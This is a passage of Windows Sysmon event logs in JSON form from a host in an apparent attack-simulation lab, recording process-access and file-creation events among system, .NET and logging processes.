b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1369-5F25-0000-001027980E00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1369-5F25-0000-001027980E00}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:02.529\r\nProcessGuid: {E2A3D6B1-1369-5F25-0000-00109C940E00}\r\nProcessId: 5088\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e0-0\\System.Deployment.dll\r\nCreationUtcTime: 2020-08-01 07:02:02.529","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:02.529","ProcessGuid":"{E2A3D6B1-1369-5F25-0000-00109C940E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e0-0\\System.Deployment.dll","CreationUtcTime":"2020-08-01 07:02:02.529","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.576\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001053C10C00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.576","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001053C10C00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.576\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001053C10C00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.576","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001053C10C00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.591\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-136A-5F25-0000-00104E9A0E00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.591","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-136A-5F25-0000-00104E9A0E00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.841\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.841","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.904\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.904","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.904\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 